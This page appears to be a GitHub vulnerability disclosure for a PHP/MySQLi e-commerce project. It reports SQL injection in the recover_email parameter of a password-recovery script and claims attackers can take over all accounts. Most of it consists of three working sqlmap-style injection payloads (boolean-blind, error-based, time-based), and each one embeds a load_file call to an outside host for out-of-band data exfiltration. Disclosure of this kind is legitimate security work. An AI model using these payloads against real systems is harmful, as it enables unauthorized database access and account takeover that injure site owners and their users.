Skip to content

Latest commit

 

History

History

Ecommerce-project-with-php-and-mysqli-Fruits-Bazar

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 
 
 

Description:

The recover_email parameter on user_password_recover.php app is vulnerable to three types of SQL injection attacks. The attacker can take access to all accounts on this system.

Status: CRITICAL

[+] Payloads:

---
Parameter: recover_email (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: recover_email=cNCbIfqe@nama1k@t1putkat@mang@lsk@.net'+(select load_file('\\\\kym3yjdn7xn8kasrttyp7av9x03trsqghj5bs1gq.namaikatiputkatam@ng@ls@.com\\olg'))+'' OR NOT 9177=9177 AND 'HeFM'='HeFM&u_pass_recover=Recover Password

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: recover_email=cNCbIfqe@nama1k@t1putkat@mang@lsk@.net'+(select load_file('\\\\kym3yjdn7xn8kasrttyp7av9x03trsqghj5bs1gq.namaikatiputkatam@ng@ls@.com\\olg'))+'' AND (SELECT 6160 FROM(SELECT COUNT(*),CONCAT(0x7178627171,(SELECT (ELT(6160=6160,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Mvga'='Mvga&u_pass_recover=Recover Password

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: recover_email=cNCbIfqe@nama1k@t1putkat@mang@lsk@.net'+(select load_file('\\\\kym3yjdn7xn8kasrttyp7av9x03trsqghj5bs1gq.namaikatiputkatam@ng@ls@.com\\olg'))+'' AND (SELECT 4612 FROM (SELECT(SLEEP(5)))vECZ) AND 'qfSm'='qfSm&u_pass_recover=Recover Password
---

Reproduce:

href

More:

href